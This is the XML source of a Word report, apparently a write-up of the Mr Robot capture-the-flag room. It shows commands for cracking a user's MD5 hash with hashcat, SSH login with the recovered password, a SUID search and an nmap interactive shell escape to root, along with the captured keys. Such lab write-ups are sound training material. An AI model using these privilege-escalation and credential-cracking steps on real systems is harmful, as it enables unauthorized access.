          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hashcat -m 0 -a 0 robot_hash.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t># → c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="3571875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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9"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill dpi="0">
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="Relimage9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="5F6C78"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 10 — Hashcat cracking the robot user's MD5 hash to 'abcdefghijklmnopqrstuvwxyz' in under 1 second</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="936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9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="93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143552"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">robot User Credentials: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>robot : abcdefghijklmnopqrstuvwxyz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P3"/>
      </w:pPr>
      <w:r>
        <w:t>4.9 Flag Two — Logging in Through SSH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>Since SSH had been identified as open during reconnaissance, it provided a direct alternative to the blocked reverse-shell connection. The recovered robot credentials were used to log in:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F1F4F7"/>
        <w:spacing w:before="60" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:ind w:left="173" w:right="115"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ssh robot@10.130.128.16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t># Password: abcdefghijklmnopqrstuvwxyz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>cat /home/robot/key-2-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="936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9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="93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143552"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Key 2 Captured: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>822c73956184f694993bede3eb39f959</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="1"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P3"/>
      </w:pPr>
      <w:r>
        <w:t>4.10 Escalating from robot to Root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>After obtaining a shell as robot, the available sudo permissions were checked. The account was not permitted to run sudo commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F1F4F7"/>
        <w:spacing w:before="60" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:ind w:left="173" w:right="115"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sudo -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t># → Sorry, user robot may not run sudo on ip-10-130-128-16.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The next check searched the filesystem for SUID executables. Such programs run with the file owner's effective privileges, which can make an incorrectly configured root-owned binary significant:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F1F4F7"/>
        <w:spacing w:before="60" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:ind w:left="173" w:right="115"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The scan revealed an unusual SUID-enabled Nmap binary at /usr/local/bin/nmap. Version 3.81 supports interactive mode, including a shell escape; in combination with the SUID permission, this configuration allowed the session to obtain root privileges:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F1F4F7"/>
        <w:spacing w:before="60" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:ind w:left="173" w:right="115"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nmap --interactive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nmap&gt; !sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t># whoami → root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>cat /root/key-3-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="3571875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill dpi="0">
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="Relimage10"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="5F6C78"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 11 — SUID nmap interactive mode exploited (!sh) to obtain root; Key 3 captured</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="936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9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="93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143552"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Key 3 Captured (Root): </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>04787ddef27c3dee1ee161b21670b4e4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P2"/>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-IN" w:bidi="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-IN" w:bidi="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>5. Key Findings and Lessons</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>Username discovery may require more than automated enumeration. The REST API, author-ID checks, and WPScan did not identify the account in this case, while comparing login error messages did. Keep a manual verification method available.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>Cleaning a wordlist can substantially reduce testing time. Removing duplicates from fsocity.dic reduced the estimated run from over nine hours to roughly five minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>Confirmed code execution does not guarantee a reverse shell. The socket timeout indicated outbound filtering, so switching to local file reads was more productive than continuing to change payloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>Checking SUID files is a quick way to find privilege-escalation opportunities. Here, a single filesystem search exposed the misconfigured Nmap binary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>Moving from the time-limited AttackBox to a Kali VM over OpenVPN affected the workflow. Recording that environment change makes the methodology reproducible and transparent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P2"/>
      </w:pPr>
      <w:r>
        <w:t>7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>All three flags were recovered, completing the Mr Robot CTF room. The exercise covered a chain of techniques beginning with unauthenticated service discovery and ending with root access: web reconnaissance, credential testing, authenticated PHP execution, hash recovery, SSH access, and SUID-based privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The most significant operational challenge was a blocked reverse shell channel, which required pivoting from an active exploitation technique (outbound connection) to a passive one (local file read through the same RCE vector), followed by a lateral move to SSH for proper shell access. This kind of mid-engagement pivot is a core skill in real penetration testing, and documenting the failed attempts as well as the successful pivot reflects honest and thorough reporting practice.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="RelHdr1"/>
      <w:footerReference w:type="default" r:id="RelFtr1"/>
      <w:type w:val="nextPage"/>
      <w:pgMar w:left="1123" w:right="1123" w:top="979" w:bottom="979" w:header="432" w:footer="461" w:gutter="0"/>
      <w:pgNumType w:chapSep="period"/>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Aptos" w:hAnsi="Aptos"/>
        <w:color w:val="646E78"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Mr Robot CTF  •  Authorized training environment</w:t>
    </w:r>
  </w:p>
</w:ftr>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right"/>
    </w:pPr>
  </w:p>
</w:hdr>
</file>

<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
<w:numbering xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:abstractNum w:abstractNumId="0">
    <w:nsid w:val="1BA164B6"/>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abstractNum w:abstractNumId="1">
    <w:nsid w:val="43D47E6F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="720"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="60C9EF41">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="300238C9">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="68DC4B5C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="28525835">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="00DDAE57">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="24DFA8F5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="012FBBA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="249FC51E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="7330B2A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="720"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="606C3D75">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="438962D7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="017FC8C1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5A7750F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="693AD755">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7C345FD6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2A4E48F9">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="595BFD70">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr/>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r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:displayBackgroundShape w:val="1"/>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cs="Arial" w:eastAsia="Arial"/>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spacing w:lineRule="auto" w:line="259" w:after="120" w:beforeAutospacing="0" w:afterAutospacing="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
      <w:color w:val="2B3642"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="P1">
    <w:name w:val="Title"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0" w:after="120" w:beforeAutospacing="0" w:afterAutospacing="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display"/>
      <w:b w:val="1"/>
      <w:color w:val="143552"/>
      <w:sz w:val="54"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="P2">
    <w:name w:val="Heading 1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="360" w:after="200" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:color w:val="1F4E79"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="P3">
    <w:name w:val="Heading 2"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="280" w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:color w:val="2E5C8A"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="P4">
    <w:name w:val="Heading 3"/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="1F4D78"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="P5">
    <w:name w:val="Heading 4"/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:i w:val="1"/>
      <w:iCs w:val="1"/>
      <w:color w:val="2E74B5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="P6">
    <w:name w:val="Heading 5"/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
